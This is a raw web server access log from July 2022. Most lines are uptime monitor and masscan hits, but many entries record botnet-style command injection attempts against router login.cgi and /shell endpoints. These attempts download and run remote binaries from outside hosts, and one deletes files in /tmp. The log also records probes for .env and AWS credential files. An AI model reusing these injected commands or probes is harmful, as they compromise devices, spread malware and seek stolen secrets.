220.133.202.134 - - [04/Jul/2022:09:54:43 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:09:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:09:56:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:09:57:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
42.85.228.196 - - [04/Jul/2022:09:57:33 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:09:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.46.154.97 - - [04/Jul/2022:09:58:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [04/Jul/2022:09:59:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.30.235.170 - - [04/Jul/2022:09:59:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:00:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:02:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
119.176.161.71 - - [04/Jul/2022:10:02:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:03:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
113.6.146.117 - - [04/Jul/2022:10:03:47 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
2.57.122.98 - - [04/Jul/2022:10:04:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:04:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
115.56.229.70 - - [04/Jul/2022:10:04:30 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:07:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:08:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [04/Jul/2022:10:08:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.104.138.223 - - [04/Jul/2022:10:09:39 +0200] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
65.49.20.67 - - [04/Jul/2022:10:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
74.82.47.2 - - [04/Jul/2022:10:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.100.22 - - [04/Jul/2022:10:10:53 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.100.22 - - [04/Jul/2022:10:10:53 +0200] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
221.153.8.5 - - [04/Jul/2022:10:11:09 +0200] "POST /editBlackAndWhiteList HTTP/1.1" 404 328 "-" "Mozila/5.0"
212.91.246.72 - - [04/Jul/2022:10:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:12:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:13:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.231.74.88 - - [04/Jul/2022:10:14:12 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:14:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.31.252.31 - - [04/Jul/2022:10:14:37 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:15:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:16:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:17:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [04/Jul/2022:10:17:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
171.120.76.53 - - [04/Jul/2022:10:18:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:18:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:19:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
143.198.174.30 - - [04/Jul/2022:10:19:19 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
1.63.119.216 - - [04/Jul/2022:10:19:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
49.171.122.25 - - [04/Jul/2022:10:20:04 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:20:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:21:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.130.30.65 - - [04/Jul/2022:10:21:35 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
116.169.12.191 - - [04/Jul/2022:10:21:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:22:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.118 - - [04/Jul/2022:10:22:35 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.118 - - [04/Jul/2022:10:22:35 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:23:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:24:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:25:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
1.30.235.170 - - [04/Jul/2022:10:25:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:26:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:27:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:28:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
201.124.165.99 - - [04/Jul/2022:10:28:51 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:29:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:30:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.218.206.66 - - [04/Jul/2022:10:30:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:31:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:32:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.249.32.102 - - [04/Jul/2022:10:32:45 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
42.82.222.21 - - [04/Jul/2022:10:32:55 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:33:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.140.95.148 - - [04/Jul/2022:10:34:15 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:34:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:35:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:36:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:37:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.237.103.118 - - [04/Jul/2022:10:38:04 +0200] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.118 - - [04/Jul/2022:10:38:04 +0200] "\x16\x03\x01\x01D\x01" 501 321 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:38:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:39:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:40:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:41:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:43:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:44:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
171.118.154.104 - - [04/Jul/2022:10:44:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
65.49.20.69 - - [04/Jul/2022:10:44:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:45:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
119.185.100.115 - - [04/Jul/2022:10:45:49 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
61.6.134.243 - - [04/Jul/2022:10:46:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:46:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.122.98 - - [04/Jul/2022:10:46:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:47:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.249.32.102 - - [04/Jul/2022:10:48:07 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
212.91.246.72 - - [04/Jul/2022:10:48:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:49:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.34.7.25 - - [04/Jul/2022:10:49:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
201.110.214.66 - - [04/Jul/2022:10:49:56 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
124.128.187.128 - - [04/Jul/2022:10:49:58 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
184.105.139.69 - - [04/Jul/2022:10:50:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
193.201.9.157 - - [04/Jul/2022:10:50:07 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:10:50:12 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:10:50:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:10:50:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
184.105.139.68 - - [04/Jul/2022:10:50:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
42.82.222.21 - - [04/Jul/2022:10:51:13 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:51:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.66 - - [04/Jul/2022:10:51:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.20.67 - - [04/Jul/2022:10:51:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.212.49.200 - - [04/Jul/2022:10:51:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
147.158.32.75 - - [04/Jul/2022:10:51:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:52:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
189.146.209.148 - - [04/Jul/2022:10:52:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
193.201.9.157 - - [04/Jul/2022:10:52:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:10:53:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:10:53:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:10:53:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:10:53:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
119.176.161.71 - - [04/Jul/2022:10:53:48 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:54:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.249.32.102 - - [04/Jul/2022:10:55:50 +0200] "GET / HTTP/1.1" 400 329 "-" "-"
201.110.214.66 - - [04/Jul/2022:10:55:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:10:56:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:10:56:18 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:10:57:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:58:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:10:59:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
223.130.30.57 - - [04/Jul/2022:10:59:25 +0200] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [04/Jul/2022:11:00:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:01:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:01:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
121.16.232.89 - - [04/Jul/2022:11:02:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:02:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:03:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:04:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
110.231.74.88 - - [04/Jul/2022:11:04:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:05:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:06:04 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:06:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
193.201.9.157 - - [04/Jul/2022:11:06:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
212.91.246.72 - - [04/Jul/2022:11:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:07:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:08:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.155.126.211 - - [04/Jul/2022:11:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
124.165.26.91 - - [04/Jul/2022:11:08:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://134.195.138.33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [04/Jul/2022:11:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.66.217.61 - - [04/Jul/2022:11:10:12 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://104.248.11.133/bins/aqua.mpsl;sh+/tmp/aqua.mpsl HTTP/1.1" 404 306 "-" "Hello, world"
212.91.246.72 - - [04/Jul/2022:11:10:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2022:11:11:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.201.9.157 - - [04/Jul/2022:11:12:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
